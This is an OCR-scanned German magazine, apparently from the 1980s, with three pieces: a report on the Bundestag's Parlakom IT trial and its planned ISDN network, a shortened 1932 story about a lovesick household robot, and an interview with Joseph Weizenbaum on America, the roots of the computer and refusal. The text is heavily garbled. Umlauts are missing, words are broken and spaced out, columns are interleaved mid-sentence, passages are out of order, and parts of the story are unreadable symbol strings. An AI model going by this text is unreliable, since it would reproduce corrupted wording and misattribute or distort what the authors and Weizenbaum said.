vird eine gewisse Skepsis gegeniber dieser L s u n g nicht geleugnet, lenn das Fehlen jeglicher Recher.hiermglichkeit u n d das gleichzeiig recht u m s t n d l i c h e Kommuni;ationsverfahren b e r Teletex las;en eine wirkliche ausschugereche N u t z u n g dieser Angelegenheit als caum wahrscheinlich erscheinen. \usgehend von der A u f g a b e eines rlaushaltsausschu-Mitgliedes, knnte eine vernnftige Datenvertrbeitung n u r d a h i n g e h e n d ausseien: Bundestagseigener Grorcchier, der g e n g e n d K a p a z i t t e n h a t , 4m nicht n u r den aktuellen, sonIcrn auch die Bundeshaushalte der etzten J a h r e sowie die ordneienhochhauses Service Z e n t r u m ein Benutzer hal.andesder jeder laushalte zu speichern. Z u r Koneingerichtet L e i t u n g des IT-Versuchs oblag zud e m G e r m a n i s t e n u n d Politologen. D V - F a c h l e u t e u n d Mitarbeiter des hauseigenen wissenschaftlichen S o f t w a r e Paket Nios-Top nicht strungsfrei a u f d e m W a n g A P C unter W a n g tionskarte nicht alle konnte Micro Dienstes der den M d B ' s in Zuk u n f t per E D V zuarbeiten sollten waren nicht beteiligt. A u c h die Vorsitzende des mit d e m IT-Konzept beschftigten die ltestenrates, spttisch n u r Tripple-S' g e n a n n t , konnte Interessengegenstze nicht begleichen. Sie selbst m u t e sich sogar V o r w r f e n wegen persnlicher Interessenkonflikte stellen, d a auch ihr M a n n fr die G M D mit P a r l a k o m beruflich zu t u n hatte. :rolle der S u b v e n t i o n s p o l i t i k Bundesregierung braucht

Subventionsempfenger Mega-Bit-Chip

Entwick-

l u n g der die Steuergelder letztlichh nicht zur deutschen kauf nutze habe Entwicklung LizenzFordie den den sondern zum japanischen

schungsausschumitgiiedcrn fgung gestellt, d a m i t diese

Gerte deswegen kostenlos zur VerW e g der S u b v e n t i o n s m i l l i o n e n im K o n z e r n besser verfolgen k n n t e n . D i e Sache hatte bereits Kreise gezogen, da Bundestagsprsident Ende letzten

Philipp

Jenninger

J a h r e s in einem Brief an die Abgeordneten a u s d r c k l i c h d a r a u f hinwies, d a n u r G e l d s p e n d e n in der S t e u e r e r k l r u n g angegeben werden mten.

ben, beheben helfen. Bei einem Besuch in den Bros schauten sie den Parlamentariern auch schon mal bei der tglichen A r b e i t ber die Schulter, u m vor O r t erste Hilfe zu leisten. Anwendertreffen hausinternen BSZ-News und die dienten

D i e Mitarbeiter der A b g e o r d n e t e n w a r e n weniger erffeut b e r die neue Technik a m Arbeitsplatz, d e n n fr sie setzt sich weder der Personalrat des Bundestages n o c h derjenige der F r a k t i o n ein. Sie h a b e n 'ihrem' Abgeordneten. ein nmlich mit aralle privatrechtliche Vertrge Einen beitsrechtlichen Status u n d Mitbestimmungsrecht

P C implementiert werden. A u f d e m MS-Dos und XF.N1X k o n n t e n trotz E m u l a Programme OSIz u m Laufen gebracht werden u n d die So-Schnittstelle fr den Slandard war nicht kompatibel.

d e m Erfahrungsaustausch. Aufgesucht wurde das B e n u t z e r z e n t r u m durch MdB's und stzlich Mitarbeiter jeVorfhr-InWohd o c h k a u m . A u c h v o n F i r m e n zueingerichtete stallationen in umliegenden

damit gibt es

Auftretende P r o b l e m e bei der Arbeit sollten die Fachleute der A D V O r g a , die i m 11. S t o c k des Abge-

feld eine 'Betriebsvereinbarung' m i t ihren M i t a r b e i t e r n abgeschlossen,

n u n g e n und Bros blieben leer. D i e

A B G E O R D N E T E A U F D R A H T : Die Mitglieder d e s D e u t s c h e n B u n d e s t a g e s gleich w e l c h e r Couleur w e r d e n in Zukunft alle dieselben .Informationskanle" h a b e n : ein weltweit beispielhaftes Information- und Kommunikationssystem soll d e m n c h s t einheitlicher Technik alle 5 3 0 A b g e o r d n e t e n , die Ausschsse, Fraktionen, in wissen-

schaftliche Dienste und die Bundestagsverwaltung miteinander verbinden. b e r die Nervenstrnge" d e s Systems, das in d e n nchsten z w e i Jahren aufgebaut w e r d e n soll, g e h e n gleichermaBen Sprache, Text, Bild und D a t e n nach d e m knftigen internationalen Fernmeldestandard I S D N (Integrated Services Digital N e t w o r k ) . D a s K o m m u n i k a tionssystem Hicom, das diese Infrastruktur zur Verfgung stellt, vermittelt a u c h den Z u g a n g z u D a t e n b a n k e n , z u e i n e m internen Btx-Irrfonmatlonssystem u n d enthlt elektronische .Briefksten" fr hinterlegte T e x t - und Sprachinformationen. O b d a s Projekt Parlakom" die Kommunikation der Parlamentarier untereinander verbessert, ist offen. Entscheidend ist, da das geplante S y s t e m mit e i n e m offenen" Industriestandard (OSI) d e n Anschlu von G e r t e n verschiedener Hersteller zult. N e b e n d e m Telefon sind es vor allem P e r s o n a l c o m p u t e r u n d Brosysteme fr die T e x t - und D a t e n k o m m u nikation oder auch multifunktionale" G e r t e , die mit Tastatur, Bildschirm und T e l e fonhrer fr smtliche Kommunikationsarten einzusetzen sind. Die A b g e o r d n e t e n , Fraktionen und A u s s c h s s e k n n e n sich also e n t s p r e c h e n d ihren eigenen Vorstellung e n zustzlich technisch ausstatten. Eine praktische U n t e r w e i s u n g d e r v e r s c h i e d e n e n Mglichkeiten fhrt der Hersteller bereits jetzt In seinem Bonner F a c h b e r a t e r z e n t r u m durch, f Jt 3 - Z ' 8? (FR-Blld: S i e m e n s ) X,

Hilfe, unser Roboter ist J liebeskrank! * "


Er massiert die Hausfrau. Er trinkt den Cognac des Ehemannes. Er versucht die Witwe Lumidatsch im Treppenhaus zu kssen. Und schlielich wird er lebensmde. Eine sentimentale science-fiction-story, von uns leicht gekrzt, die Friedrich Kroner schon 1932 ersann., ^ ^

nicht hineingehrte, d e n j i e r warf sie einfach in den P a p i e r k o r b . In O r d n u n g " , sagte er u n d - s c h a U e t c Julius wieder zu. A u c h . J u l i u s schien zufrieden. E r sa a u f r e c h t starrte seinen K o n s t r u k t e u r mji verklrten A u g e n an: B e s s e s viel besser" - Na also", s a g t e der Chefingenieur u n d ging. Von diesem Tag an war J u i i u s ^ verwandelt. Er tat z w a r s e i n e Arbeit gewissenhaft und g e r u s c h l o s weiter, aber sein Blick w a r abwesend. Meine Frau, mit d e m in. stinkt ihres Geschlechts, f r a g t e ihn besorgt: Ist dir etwas, J u l i u s ? O h , nichts, gndige F r a u " 'fi*' sterte er und blickte v e r k l r t rar Decke. Eines Tages berraschten w i r Julius: In einem Sessel s i t z e n d Buch in der H a n d , T r n e n i n H Augen und Verse gegen d i e t w S flsternd, die er a u s w e n d i g Es waren Liebesgedichte j sah und hrte uns nicht. W i r t den sprachlos in der T z Bescherung. Wir hatten s c h o T mal, ich wei nicht, o b erwhnt habe, vor zwei V f ^ . .

ir harten jahrelang einen sogenannten FubodenRoboter gehabt, ein kleines, murksiges Ding. Er kehrte den Boden, wusch ab, kochte ganz gut und half meiner Frau auch mal beim Anziehen. Aber er war acht Jahre alt, und er schnaufte doch schon stark, und es rasselte in seinen Gelenken. E h e man so einen Roboter zum berholen in die Fabrik schickt, dann schon lieber weg! Wir kauften uns also einen neuen Roboter, einen Superfix. Als er nach dem Kauf in unserer Wohnung ankam und kaum drei Atemzge getan hatte, sagte er schon im mibilligendem Ton: Staub, viel Staub." Er sah sich kopfschttelnd in der Kche u m , machte sofort das Fenster auf und setzte den Ventilator in G a n g , dann lftete er den Deckel des Mlleimers und sagte mit der Stimme in Moll: Schweinerei!" Wir lieen ihn in der Kche zurck. Meine Frau gab ihm Anweisungen fr den nchsten Tag. Er funktionierte aber wirklich ganz hervorragend. Vor allem hatte dieses schreckliche Rasseln und Keuchen in der Wohnung aufgehrt. Es wurden keine Tren mehr geworfen. D i e ganze'Arbeit ging mit einer Przision und Geruschlosigkeit vor sich, da man manchmal verwundert daneben stand und staunte. U n d als Masseur war er groe Klasse. Meine Frau war restlos begeistert!

zahlen mssen, weil unser TT-

der Witwe Lumidatsch e i n e

sie auf d e m T r e p p e n a b s a t / J ^ Tadle gefat und v e r s u c h t h t sie abzukssen. hatle Meine Frau sah mich a n , meine Frau an. D e r R o h C h s a i " b e b im Sessel sitzen, a m ? n Trnen in den A u e e n an ,, Haben Sie keine A n g s t <7 ^ S 1 8 nicht hier im H a u s " 'Wohni Wir lagen die ganze N a c h , los und besprachen die < 5 ^blafhe wir aufwachten, war e s - Als mittags. Kein F r h s t c k t 0 1 * U h r ne summende K a f f e e m a ^ l ^ c h , kein e schweige die Meldung- ' 8e" stck ist angerichtet " v a F n i h J u l i u s in der Kche. D i e Schir Korridortr waren du7^el deB Briefschlitz nach innen h? worfen Wir htten uns l c h ^ T gemacht, wenn wir in den > r h c h gen inseriert htten: J u l i u s ? l t U B * zurck." ' tehie D e n wirklichen G r u n d , w a r . , - lius uns verlie, haben w i / m J u " geahnt: Er war l e b e n s b e r d w - n i C h t Er suchte seinem Leben e i n R *Jzu machen, und wie r a f f i n i p o d e vorging, wie er die A n des s l l e i mordes berdacht haben m u u weist sein Ende, das wir a u ? r 5 s Zeitung erfuhren. Julius war der v o l l k o m m e n s t e ft boter, der jemals gelebt h a t R ging in eine E i s e n w a r e n h a n d i , und verlangte ein D u t z e n d S c h r a benzieher und S c h r a u b e n s c k i ^ U * sei. D a m i t ging er auf e i n e n J e ~ derspielplatz im Park, setzte V ^ J unter eine G r u p p e h a l b e n v a c u ner Lmmels und sagte: . J u j , 8 ! mir ist nicht ganz gut, seht dn 8 !*"' Q c h mal nach, was mir fehlt." ; Nach d e m Bericht der Z e i t u n K es keine Stunde gedauert, bis S k i ! ! eine Schraube mehr a n u n S e r T Julius in ihrem Gewinde sa.

Meine Frau sah mich an, ich sah meine Frau an. Der Roboter blieb im Sessel sitzen, starrte uns mit JYnen in den Augen an und sagte: Sie wohnt nicht hier im Haus."
Schaden u n d fand schlielich einen Defekt in der oberen rechten Schulterkammer. Ein kleiner, winziger Draht hatte sich aus dem Kontakt zur Kopfschaltung gelokkert, und damit schien der Schaden beseitigt. Z w l f Stunden lag unser Roboter wie ein Toter und pumpte seinen Raiisch aus. D a n n machte er wieder seinen Dienst so gewissenhaft wie vorher. A b e r acht Tage spter, an einem Sonntagnachmittag, als unser Roboter seinen Ausgang hatte, war er in ein Tanzlokal eingedrungen, obwohl den Robotern der Eintritt in alle ffentlichen Lokale streng verboten war, hatte dort ein junges Mdchen einfach um die Hfte genommen und mit ihr zu tanzen begonnen, dabei hatte er fnf Personen umgeworfen sowie einen Tisch mit vier Tassen Kaffee und drei Torten, die wir samt dem Geschirr bezahlen muten. Wir waren gezwungen, ihn am anderen Morgen von der Polizei abzuholen. Als wir unseren Roboter von der Polizei herausbekommen hatten, gab es eine sehr ernsthafte Auseinandersetzung mit ihm. Meine Frau nahm ihn ins Gebet. Julius", sagte sie, du bist so klug, du hast so gute Manieren, wei der H i m m e l , wenn die Fabrik imstande wre, deine Fehler abzustellen, wir wrden dich wie ein Kind im Hause halten." Solche Redensarten nutzten natrlich gar nichts. Julius versprach, gelobte Besserung. U n d die nchsten 14 Tage sa er auch, wenn er nichts zu tun hatte, nachdenklich und still auf dem Kchenstuhl und starrte zur D.ecke. Schlielich dachte ich, schicke ihn doch mal zum Psychoanalytiker. Vielleicht findet der einen Komplex, den sein Ingenieur in ihn hineingebaut hat. Ich schrieb an die Fabrik einen energischen Brief, ich zhlte alle Zwischenflle mit Julius auf. Das Ergebnis war, da der Chefingenieur kam, der Julius 14 Tage vorher berprft hatte. Julius erkannte ihn auch so*fort wieder. Er fiel ihm um den Hals und begann zu weinen. Es war eine peinliche Situation. D e r Chefingenieur entschuldigte sich, schrie ihn an und befahl ihm, sich auf die Chaiselongue zu legen. D a n n begann er ihn abzuklopfen und abzuhorchen, schaltete jede Brustkammer einzeln aus, ja, schlielich ffnete er sogar die Kopfkammer. Pltzlich schrie er berrascht. A h ! " und holte mit einer Pinzette eine mikroskopisch kleine Spirale heraus, die sich vielleicht gelockert hatte oder gar

A u c h ich war mit ihm sehr zufrieden. E r staubte meine Bibliothek, die ber 2000 Bnde enthlt, mit einer Akkuratesse und Schnelligkeit ab, wie kein Mensch es imstande gewesen wre. Aber nach einigen Monaten merkte ich den G r u n d fr seine Leidenschaft, in meinem Z i m m e r aufzurumen. Eines Abends, als wir aus dem Theater nach Hause kamen, lag er total betrunken, man kann schon sagen, sinnlos betrunken, im Klubsessel , eine vllig geleerte Kognakflasche neben sich. Wir telefonierten noch in derselben Nacht mit dem Arzt, ich wollte sagen, Ingenieur. Er kam auch, besah sich den

Mg

Joseph Weizenbaum:

"Die Technik in die Schranken weisen"


Der Weg ist das Ziel! / Ein Interview

&

Im deutschen Sprachraum wurde Joseph Weizenbaum (geboren 1923 in Berlin, 1936 emigriert in die g USA, Professor fur Informatik am Massachusetts Institute for Technology, MJ.T.) bekannt durchs seine Bcher "Die Macht der Computer und die Ohnmacht der Vernunft" (Frankfurt 1977) und "Kurs auf den Eisberg" (Zrich 1984). Unermdlich weist Weizenbaum auf die Grenzen der Technologie hin und warnt vor der Gefahr, die sich aus einer ungebremsten Entwicklung von Wissenschaft und Technik ergeben kann. Im nachfolgenden Gesprch geht es um das historische, kulturelle und soziale Umfeld einer Zivilisationsentwicklung, die in der elektronischen Datenverarbeitung einen Kulminationspunkt erreicht. Das Gesprch fhrte Markus Schmidt; es fand im Haus der Familie Domzalski (Dorothea und Leo Domzalski sowie ihre Shne Adrian und Oliver Thomas) in Berlin statt, die sich ebenfalls an dem Gesprch beteiligten.
Mit freundlicher Genehmigung dem INFO 3 Magazin entnommen

^ v a n g e , bevor Weizenbaum mit seinen Bchern ein breites Publikum erreichte, halle er bereits einen Namen in der Fachwelt: Mit dem 1965 geschriebenen Computerprogramm "Eliza" erregte er einen Sturm der Entrstung und des Erstaunens. Mit "Eliza" wollte Weizenbaum beweisen, da der Computer eines nicht kann: den Menschen als Gesprchspartner des Menschen ersetzen. "Eliza" ist ein sogenanntes "diulogfiihiges" Programm: Dem "Gesprchspartner" am Terminal wird vorgetuscht, der Computer verstehe seine Aussagen oder Fragen, ja als knne die Maschine durch ihre pseudoverstndnisvollen Rckfragen dem menschlichen Gegenber in seinen seelischen Problemen helfen. Das Experiment "Eliza" schlug fehl. Allerdings nicht etwa, weil das Programm nicht funktioniert htte im Gegenteil: Viele Menschen glaubten an die autonome "Macht der Computer" und waren bereit, der Maschine ihre seelischen Probleme zu unterbreiten. Der Computer ist geduldig. Er steht nicht auf und geht weg, vor ihm kann man sich nicht blamieren. Und eine Reihe von Joseph Weizenbaums Fachkollegen meinten begeistert, endlich den elektronischen Psychotherapeuten gefunden zu haben, der auch mehrere "Patienten" gleichzeitig "behandeln" knne. Es war vor allem diese Erfahrung - wie leicht Menschen bereit sind, sich der Autoritt der Technik zu unterwerfen - , die Joseph Weizenbaum zum "Rufer in der Wste" werden lie. Sich selbst bezeichnet Weizenbaum als Pessimisten, was die Entwicklung der menschlichen Zivilisation anbelangt: "Kurs auf den Eisberg". Gerade aus dieser negativen Zukunftserwartung aber entwickelt er das Recht, ein Hoffender zu sein: Nur wer eine positive Entwicklung nicht erwartet, ist imstande, sie zu erhoffen. In diesem Sinne wendet sich Joseph Weizenbaum an seine Zeitgenossen mit der Aufforderung, das "Wunder" zu ermglichen, welches darin besteht, das Ruder jener "Titanic" herumzureien, auf der er uns mit voller Kraft dem Untergang entgegenfahren sieht. Ein "Wunder", das nicht durch die Entscheidung politischer Wrdentrger, sondern durch die Verantwortung des Einzelnen bewirkt werden kann: Wenn jeder von uns die Bereitschaft entwickelt, derjenige zu sein, der das Ruder herumreien knnte, dann haben wir eine Chance.

Im amerikanischen Innenleben ist von den Indianern tatsclich sehr wenig briggeblieben: einige vllig veruerlichte Feste oder Riten - Tatsache ist aber, da die Indianer ermordet wurden, und zwar nicht nur im ueren. Damit hngt vielleicht zusammen, da es in Amerika so gut wie kein Geschichtsbewutsein gibt. Das wird durch die Medien noch untersttzt: Vllig zusammenhanglos werden die Tagesereignisse nebeneinandergestellt ein Sportereignis neben ein Eisenbahnunglck in Kalkutta. Wenn zum Beispiel Richard Nixon in den Medien erwhnt wird, kommt mit Sicherheit der Zusatz: "formet President of United States", weil man einfach nicht davon ausgehen kann, da das jemand wei. Die indianische Kultur ist im aligemeinen nur noch Entertainment fr die amerikanische Bevlkerung. So mu sich z.B. jeder amerikanische Prsident einmal mit einem indianischen Federschmuck fotografieren lassen. Das hat aber berhaupt keine Bedeutung. Eine bewute Identifizierung Findet da nicht statt. berhaupt ist das Bewutsein fr die indianische Kultur sehr dnn. Man wei von ihr, abstrakt, so abstrakt, wie man auch die Entfernung zum Mond kennt. Das hat mit dem Innenleben Amerikas nichts zu tun.

damit nicht auch die enormen sozialen Diskrepanzen in Amerika zusammen?

Joseph Weizenbaum: Es freut mich sehr, d a D u das ansprichst. Du hast vllig recht: Die Verschiedenheit Amerikas uert sich natrlich n i c h t n u r in der Unterschiedlichkeit der Straenbilder, sondern auch in den sozialen Bereichen. Adrian Domzalski: Was mich allerdings w u n d e r t : Diese verschiedenen sozialen Schichten lassen sich durch dasselbe Femsehen befriedigen. Joseph Weizenbaum: Darauf habe ich auch keine Antwort. Ich kann da auch nur staunen. A b e r es ist eine Tatsache: Gerade die Armen haben den Fernseher oft als einziges "kulturelles" A n g e b o t . Einen alten Fernseher bekommt man schon fr zehn Dollar. In den wohlhabenderen Schichten bernimmt der Fernseher oft die F u n k t i o n des Babysitters. Und fr die lteren Kinder gibt es ja jetzt die Videospiele. Klaus Hafner fhrt sie immer als einen Fortschritt gegenber dem Fernsehen an, weil die Kinder hier nicht nur passiv vor dem Kasten sitzen, sondern selbst aktiv wrden. Ich kann darauf nur antworten: Bisher haben die Kinder im Femsehen ein U-Boot gesehen, das torpediert wird, in dem Hunderte von Menschen ums Leben kommen. Heute k n n e n sie nun selbst diejenigen sein, die das U-Boot abschieen. Markus Schmidt: Was Sie damit andeuten, ist doch, da sich der Computer aus Vorhergehendem entwickelt hat. In Ihren Bchern haben Sie j a oft darauf hingewiesen, da der Computer ein Kind des Zweiten Weltkrieges ist . . . Joseph Weizenbaum: . .. und des Kalten Krieges! Markus Schmidt: Wo ist nun aber der eigentliche Ursprung des Computers zu suchen? Joseph Weizenbaum: Mir scheint an diesem Gesprch symptomatisch zu sein, wie schnell w i r die Indianer vergessen haben. Das ist typisch amerikanisch. Man spricht ber die Indianer, w e es sie ja nun einmal gegeben hat und k e h r t zur Tagesordnung zurck und zum Computer. Und noch etwas soll nicht vergessen werden: D e r eben angesprochene Freiheitsdrang, der den amerikanischen Pionieren nachgesagt wird, ist eine Folge der Unterdrckungen, die die Menschen i n Europa erleben muten. Man darf das nicht idealisieren oder romantisieren. Leo Domzalski: Wenige gingen nach A m e r i k a um eine bessere Welt zu schaffen, die meisten mit der Hoffnung, fr sich ein besseres L e b e n zu haben. Joseph Weizenbaum: Ein Beispiel sind, die i r e n Damals herrschte eine Hungersnot in I r l a n d Die hatten einfach Hunger!
Wenn man das mit unserer heutigen S i t u a t i o n vergleicht, mu man feststellen, da die S i t u a t i o n Westberlins geradezu symbolisch ist fr unsere Situation berhaupt: Unsere Gesellschaft isj- u _ . ringt von einer Mauer. Man kann heute nicht mehr "weggehen", auch von Amerika n i c h t Es gibt das "andere " Land nicht mehr.

Selfmade-Mnner
Markus Schmidt: leben Amerikas?
Was ist dann aber das Innen-

Joseph Weizenbaum: Das Wichtigste am Innenleben Amerikas ist, da es sehr vielgestaltig ist, so wie Amerika ja berhaupt sehr unterschiedliche Seiten hat. Es gibt keinen Ort in den Staaten, von dem man sagen knnte: Das ist das typische Amerika. Sie sind alle vllig verschieden. Ich lebe in Cambridge, Massachusetts und mu tglich erleben, da ich einfach nicht wei, was Amerika ist.
Von einem Gesichtspunkt aus gibt es allerdings eine "Homogenisierung" Amerikas: in der Werbung und in den Medien. So sind beispielsweise die Hotelzimmer der "Holiday Inn"-Hotels berall gleich, so da man sich berall "zuhause" fhlen soll. Man kann dann nicht mehr unterscheiden, ob man in Chicago ist oder in Curachi. Und auch das Fernsehen bringt berall die gleichen Nachrichten. Das ist eine Form der "Vereinigung" Amerikas, die vllig trivial ist, die aber doch sehr tiefe Konsequenzen hat. Dieses Amerika hat nichts mehr mit den Indianermythen zu tun. Es hat auch nichts zu tun mit den Pionieren, die nach Amerika einwanderten, Im 18., 19. Jahrhundert gab es nach Westen hin gewissermaen eine offene Grenze. Man konnte seinem Schicksal entlaufen und neu anfangen. Daher stammt die Idee des "Selfmademan", eine der Grundsulen der amerikanischen Kultur! An dieser Stelle kann man brigens einen gewaltigen Unterschied beispielweise zur japanischen Kultur feststellen: Die Sozialisierung eines neugeborenen Kindes geht in Amerika von der Prmisse der vlligen Hilflosigkeit des Kindes und seiner totalen Abhngigkeit von den Eltern aus. Das Erziehungsziel ist deshalb, das Kind so schnell wie mglich unabhngig werden zu lassen. In Japan ist es genau umgekehrt: Hier wild der Sugling gerade in seiner vlligen Unabhngigkeit von allen sozialen und gesellschaftlichen Bindungen gesehen, und die Erziehung soll nun bewirken, da das Kind in die Gesellschaft eingebunden wird. Natrlich ist das in Amerika - und vermutlich auch in Japan - vollkommen unbewut: es ist eine tief internalisierte Aufgabe der Eltern.

Markus Schmidt: Die Entwicklung der technologischen Zivilisation in unserem Jahrhundert ist in entscheidendem Mae von den Vereinigten Staaten geprgt worden. Hat das vielleicht seinen Grund darin, da einerseits in der amerikanischen Geistesgeschichte der europische kulturelle Ursprung vergessen wurde, andererseits aber die ursprunglich amerikanischen Zivilisationsformen Amerikas, die der Indianer, nicht nur nicht aufgenommen, sondern sogar mit massivster Gewalt verdrngt wurden?
A u f einer leider nur kurzen Reise durch die USA hatte ich das starke Erlebnis, da sich zwischen Kultur und Natur in Amerika eine gewaltige Kluft befindet. Ein anschauliches Beispiel daftr ist San Francisco: Ohne jede Rcksicht auf natrlich gewordene Landschaftsformen sind hier die Straenzge einfach nach einem Rasterplan quer ber die hgelige Landschaft gebaut worden.

Chaos und Abstraktion


Markus Schmidt: Wenn man das jetzt n o c h einmal fr die amerikanische Gesellschaft b e t r a c h tet: Ist es nicht so, da diese unsichtbare M a u e r von der Sie sprechen, in den USA auch damit r i sammenhngt, da die Zivilisation dort e n t s t s den ist einerseits durch den Ausbruch au& a * Traditionen der Alten Welt und andere -f durch die Verdrngung der ursprnglichen inrtnischen Kultur, da die amerikanische K u l t " ur also gewissermaen wurzellos schwebt?

Joseph Weizenbaum: Ich lebe seit 51 Jahren in den Staaten und kann nur sagen: Ich weift immer noch zu wenig ber Amerika, um zu einer solchen Aussage zu kommen. Ich bin mit solchen Vereinfachungen sehr vorsichtig. Um a u f l h r Beispiel einzugehen: In Boston sind die Straen einfach die ausgebauten Kuhpfade, auf denen ehemals die Cowboys ihre Herden getrieben haben. Um sich in Boston zurechtzufinden, mu man sich auskennen, da kommt man mit Rastern oder Mathematik nicht weiter.

Dorothea Domzalski: Diese Erziehung zum "Selfmademan" - das ist doch in gewisser Weise auch eine krasse Aufforderung zum Egoismus. Hngen

Joseph Weizenbaum: Von dieser Verdrngung herrscht aber berhaupt kein Bewutsein. Die Antwort, die man bekommen wrde: Es war doch nichts da! Als ich 1936 nach Amerika k a m , kannte ich keine Unterdrckung der Schwarzen, weil ich die Schwarzen berhaupt nicht wahrn a h m . Sie waren fr mich einfach nicht-da. Das ist ein Trick, den der Mensch nur zu gut beherrscht: Zu verdrngen, was er nicht sehen will.
Die Pioniere, die 1850 in den Westen zogen, hatten diese Fhigkeit, die Indianer auer in den Visieren ihrer Gewehre zu ignorieren, in ungeheuer starkem Mae ausgebildet. Und diese Menschen fielen keineswegs vom Himmel: Sie kamen eben aus Europa.

in ihre Schranken weist: Bis hierher u n d nicht weiter? Und aus welcher Motivation kann vielleicht auch wieder eingegliedert werden, was jahrhundertelang verdrngt wurde? U n d : Gengt es zu verweigern oder braucht man fr die Bildung einer positiven Zukunftsentwicklung noch etwas anderes?

Leo Domzalski: Damit ist ein bestimmtes Verhltnis zur Natur gekennzeichnet: Die Indianer wurden als Naturvolk angesehen und die Natur, die Wildnis, mute besiegt werden. Die Folge ist, da die Indianer vertrieben und schlichtweg ausgerottet wurden. Markus Schmidt: Ich sehe hier doch eine ziemlich direkte Linie zur Entstehung des Computers. Dieser Drang danach, die "Wildnis", die man als Chaos empfand, durch die Ratio zu ordnen und z u beherrschen, den natrlichen Strukturen das Merkmal logischer Abstraktion aufzuprgen bildet diese innere Haltung nicht den Boden fr solche Entwicklungen, die schlielich auch den Computer hervorbringen?

Joseph Weizenbaum: U m verantwortlich handeln zu knnen, m u man Zeit haben, sich sein zuknftiges Verhalten zu berlegen. Wenn diese Zeit nicht gewhrt wird, dann bleibt einem oft nichts anderes brig, als sich z u verweigern. Die Entwicklungen gehen zu schnell: Man hat nicht die Zeit, sich grndlich genug zu berlegen: Fr diesen Zweck sollen die Eisenbahn oder der Khlschrank oder der Computer nicht angewendet werden. Man kommt schlielich an einen Punkt, wo man nur noch sagen kann: "Auihren! Slop! 1 want to get off! Ich brauche Zeit!"
Die Versuchung, ohne gengende Zeit auszukomm e n , also nur noch Sachzwngen zu folgen, ist gewaltig. Die Verweigerung sehe ich als eine Art Notruf. Nicht, da ich mich grundstzlich verweigern wollte. Ich kann aber mein eigenes Verhalten nicht verantworten, ohne nachzudenken. Ich mu aufhren, um nachdenken zu knnen: Eine Stunde, einen Tag oder ein Jahr. U n d inzwischen geht die Welt weiter. Manchmal scheint es mir fast, als ob es gar kein Aufhren geben knnte.

hervorgegangen aus der Protestbewegung und steht nun vor der Frage: Was wollen wir eigentlich ber den Protest hinaus? Bei den Grnen plant m a n inzwischen einen Strategiekongre, in dem diese Frage im Vordergrund stehen soll. Wenn es nun gelingt, sich selbst die Zeit zu nehmen, die man braucht, um zu entscheiden: Was will ich eigentlich? - was macht man mit diesem Freiraum?

Joseph Wehenbaum: Markus Schmidt:

Dann hat man es geschafft.

Damit allein schon?

Joseph Weizenbaum: Mglicherweise. Das, was sich bei den Grnen abspielt, da sie wissen mssen, was sie tatschlich wollen, das ist ja auch die Aufgabe des Einzelnen. Und das ist eine sehr schwierige Aufgabe in dieser Welt.
Ich habe eine interessante Erfahrung gemacht mit meinen vier Kindern: Ungefhr im gleichen Alter kamen sie zu mir, um sich in bestimmten Lebenssituationen Rat zu holen. Und ich habe schlielich allen den gleichen Rat gegeben, ganz einfache Hinweise - aber nicht, weil ich ihn schon vorher gewut htte: Er hat sich jeweils neu aus jeder der einzelnen Situationen entwickelt. Worauf ich damit hinweisen will: Es k o m m t gar nicht so sehr darauf an, was im einzelnen fr ein Resultat entsteht. Viel wichtiger ist es, wie man dahin k o m m t . Der Weg ist das Ziel. Letztes Jahr sprach ich auf einer Podiumsdiskussion hier in Berlin von dem Kern aller groen Religionen in der Welt: Christentum, Buddhismus, Islam. Sie haben alle etwas gemeinsam: die Liebe. Damals hat mir jemand aus dem Publikum das Brecht-Zitat entgegengehalten "Erst k o m m t das Fressen, dann k o m m t die Moral". Er hatte recht: Es geht nicht nur um Liebe, es ist Brot und Liebe, was notwendig ist. Es ist fr uns, die wir hier in einem schnen Haus bei Kaffee und Kuchen zusammensitzen, sehr einfach: Wir knnen uns die Zeit nehmen. Das knnen wir aber nur, weil wir das "Fressen" schon haben. Eine groe Mehrheit der Menschheit hat diese Zeit nicht, weil sie das Brot nicht hat. Das darf nicht vergessen werden.

Dorothea Domzalski: Ich denke, es kann immer Adrian Domzalski: Knnte man sagen: Wir als nur ein individuelles Aufhren sein. Und das ist Europer haben das, was Amerika geworden ja dann auch durchaus etwas Aktives. Damit verist, gewissermaen aus uns herausgesetzt und verbunden kann ja der Wunsch sein, als Mensch ein drngt? sozialeres Leben zu fuhren, wenn man sieht, in welche Isolation der Fernseher oder der CompuJoseph Weizenbaum: Ich glaube, es ist eigentlich ter fhren. Insofern ist es doch von Nutzen, auf eine viel allgemeinere Frage, um die es hier geht. diese Drogen zu verzichten. Es ist die Frage, wo berhaupt Erfindungen herkommen. Es geschieht viel zu schnell, da man der Wissenschaft eine Autonomie zuspricht, die Joseph Weizenbaum: Mir fllt immer wieder auf, eigentlich gar nicht existiert. Insbesondere wh- da gerade die Kinder heute schon viel zu oft vor . rend der Kriegszeit gab es durchaus Notwendig- Entscheidungen gestellt werden, ohne wirklich keiten. Trajektoren von Geschobahnen muten die Zeit zu haben, sich darauf vorzubereiten, sich berechnet werden, es stellten sich die gewaltigen zu berlegen, was sie eigentlich wollen. Aus dieAufgaben der Logistik, Nachschubversorgung, ser Not ist der einzige Ausweg oft die VerweigeRstungsproduktion, Treibstoffversorgung mu- rung - einfach aus dem Zeitdruck heraus, in dem ten organisiert werden. Da gab es wirtschaftliche wir leben. Die Zeit fehlt in unserer Welt, sich vorNotwendigkeiten, und es gab eine Reihe von zubereiten, gerade fr die Heranwachsenden. technischen Mglichkeiten: Daraus entstand der Dabei haben wir doch nichts anderes als Zeit. Computer. Von einer Autonomie der Wissen- Wir leben in der Zeit. Aber dann kommen die schaft zu sprechen, wre hier Unsinn. Und es war sogenannten Sachzwnge. Was da zwingt, sind auch durchaus kein Zufall, da der Computer in viel weniger die Sachen als man selber, indem den USA, Grobritannien und Deutschland man sich gezwungen fhlt. gleichzeitig entwickelt wurde. Es war eben nur Konrad Zuses Pech, da die Iljtler-Regierung Und dann k o m m t die riesige Versuchung, wenn nicht erkannte, was er da in den Hnden hatte. man ein Talent hat, zum Beispiel fr Mathematik, dieser Begabung einfach nachzugehen, ohne die Zeit zu haben, darber nachzudenken: Was Ein anderes Beispiel ist Robert McNamara, der macht denn die Mathematik in unserer Welt Verteidigungs- (also eigentlich Kriegs-)minister eigentlich? unter John F . Kennedy und Johnson - also whrend des Vietnamkrieges. Er wai ein K i n d dieser Markus Schmidt: Bei der Frage nach der Verweisystematischen Kriegsfhrung. Schon im Zweiten gerung m u ich an die Situation der kologischen Weltkrieg war er einer der allerersten, die die Bewegung in der Bundesrepublik denken: Sie ist Logistik der 